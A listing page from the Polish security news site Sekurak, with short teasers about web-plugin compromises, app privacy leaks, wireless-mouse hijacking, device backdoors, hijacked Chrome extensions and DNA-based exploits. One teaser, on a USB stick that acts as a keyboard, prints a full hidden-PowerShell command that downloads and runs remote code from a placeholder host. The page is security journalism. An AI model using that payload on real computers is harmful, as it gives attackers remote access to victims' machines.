Konferencja Mega Sekurak Hacking Party w Krakowie – 26-27 października!
Adminie… Czy znamy Twoje grzechy? ;-) Sprawdź!
Konferencja Mega Sekurak Hacking Party w Krakowie – 26-27 października!
Adminie… Czy znamy Twoje grzechy? ;-) Sprawdź!
Aplikacje WWW narażone są na wiele zagrożeń; czasem są to klasyczne wektory ataku znane z OWASP Top 10, innym razem okazuje się, że potencjalna luka bezpieczeństwa “aktywuje się” dopiero po jakimś czasie. Sucuri donosi o przypadku odkrycia nierozwijanej wtyczki Enmask Captcha dla CMS WordPress, która ładowała skrypt JavaScript z zewnętrznej…
Czytaj dalej »Kwestie związane z prywatnością bardzo szybko rozgrzewają zainteresowanie mediów. W ostatnim czasie pod ostrzał wystawiona została aplikacja AccuWeather w wersji na iOS. Okazuje się, że nawet przy wybranej opcji, która zabrania aplikacji udostępniania informacji o naszej bezpośredniej lokalizacji (GPS), na serwery firm trzecich przesyłany był BSSID routera Wi-Fi, do którego został…
Czytaj dalej »Dla osób nie będących w temacie, tytuł może być nieco dziwny. Co ma mysz bezprzewodowa do przejmowania komputera? Odsyłam więc do opracowania firmy Bastille z 2016 roku, gdzie pokazano, że dongle które używamy z bezprzewodowymi myszami, w wielu przypadkach akceptują również podłączenie bezprzewodowej klawiatury. Dodajmy jeszcze brak szyfrowania radiowej komunikacji i…
Czytaj dalej »O skimmerach pisaliśmy już wiele razy. Inwencja przestępców jednak się nie kończy – zobaczcie kilka kolejnych przykładów:
Czytaj dalej »Tym razem będzie krótko – przedmiotem moich badań jest tym razem kamera Bosch FlexiDome IP micro 2000. Trochę ekwilibrystyki (o której w następnym odcinku), i można za pomocą odpowiedniego, nieuwierzytelnionego requestu HTTP zrzucać zawartość pamięci z działającej kamery. Taki haertbleed – tylko bez https ;) W pamięci jak wiadomo, można…
Czytaj dalej »Krótkie ataki o przepustowości 300Gbps, powtarzane w niewielkich odstępach. Dlaczego atakujący stosują tak nietypową technikę? Prawdopodobnie jest to optymalizacja działania botnetów. W tym scenariuszu można równolegle zaatakować wiele celów, a często po otrzymaniu kilkominutowej paczki ruchu 300Gbps, ofiara podnosi się długo (np. po wypełnieniu całej pamięci operacyjnej, uruchomieniu swap, itp.)…
Czytaj dalej »BBC opisuje garść ataków dotykających firmy spedycyjne (shipping companies), wśród których warto zwrócić na co najmniej jeden. Mianowicie omawiany jest przypadek instalacji malware w średniej wielkości firmie spedycyjnej. Malware wg cytowanego opisu przechwytywał e-maile z / do działu księgowego i podmieniał numery rachunków kont. Przykładowo, dostawca paliwa pisze maila z…
Czytaj dalej »Uszkodziłeś ekran w swoim telefonie – to w obecnych czasach nie problem. Kilka dni w serwisie i telefon jest jak nowy :-) A nawet lepszy – nowy ekran może mieć backdoora. Jakoś wszyscy przywykli chyba do tego, że dostęp fizyczny ~= przejęcie urządzenia. Ale z drugiej strony, niewiele osób zastanawia…
Czytaj dalej »Opublikowana została informacja o możliwości obejścia uwierzytelniania w Ubiquiti airMAX oraz Ubiquiti airOS, w przypadku, gdy wykorzystywany był interfejs airControl web-UI. Podatność wynika po części z ryzyka i trudności jakie wynikają z prób odwoływania się z poziomu aplikacji WWW do programów i skryptów powłoki systemowej. Niemałe znaczenie miało również wykorzystanie…
Czytaj dalej »Firma Proofpoint donosi o kolejnych rozszerzeniach do Chrome, które zostały przejęte. A bardziej precyzyjnie – przejęte zostały konta osób tworzących rozszerzenia, po czym do oficjalnego sklepu Google z rozszerzeniami została wgrana zainfekowana wersja. Pisaliśmy niedawno o historii z The Web Developer (ponad 1 000 000 instalacji), a Proofpoint wskazuje na kolejne zainfekowane rozszerzenia:…
Czytaj dalej »Pisaliśmy już wiele razy o naszym nowym projekcie, czyli rozwal.to premium. Co ma być tutaj w przeciwieństwie do “zwykłego” rozwal.to? Po pierwsze – dostępna teoria do każdej grupy zadań; będą tu też zadania mocno nietypowe – jak np. hackowanie WebSocketów czy zabawy z OAuth2.0 Po drugie – zadania, dla których…
Czytaj dalej »Opis przygotowania pendrive, który po podłączeniu działa jak klawiatura. Klawiatura ta z kolei wpisuje zaprogramowaną wcześniej sekwencję klawiszy – np. uruchamia powershella i daje zdalny dostęp na docelowy komputer. Np. tak: Keyboard.println(“powershell.exe -nop -w hidden -c $C=new-object net.webclient;$C.proxy=[Net.WebRequest]::GetSystemWebProxy();$C.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $C.downloadstring(‘http://1.2.3.4:8080/’);”); Keyboard.write(KEY_RETURN); Sercem projektu jest produkt “Adafruit Trinket – Mini Microcontroller” –…
Czytaj dalej »O shodanie pisaliśmy już wiele razy. Tym razem popatrzcie co udało nam się namierzyć (to nieuwierzytelniona sesja VNC):
Czytaj dalej »Po 3,5 roku działalności sekuraka otwieramy się na zewnętrzną reklamę. Garść statystyk: W lipcu 2017r. zanotowaliśmy wejścia z około 225 000 unikalnych adresów IP (dane z analizy logów webserwera) Nasze profile śledzi około 34 000 osób (Facebook + Twitter + Wykop) Mamy zarejestrowanych około 6000 kont na siostrzanym serwisie –…
Czytaj dalej »Ostatnio media obiegła dość interesująca informacja o możliwości zsyntetyzowania takiego DNA, które da wykonanie kodu na maszynie, która służy do sekwencjonowania DNA (czyli w pewnym uproszczeniu poznania ciągu liter – odpowiadającym czterem parom nukleotydowym – wchodzących w skład DNA). Autorzy piszą w swojej pracy tak: We demonstrate, for the first time, the…
Czytaj dalej »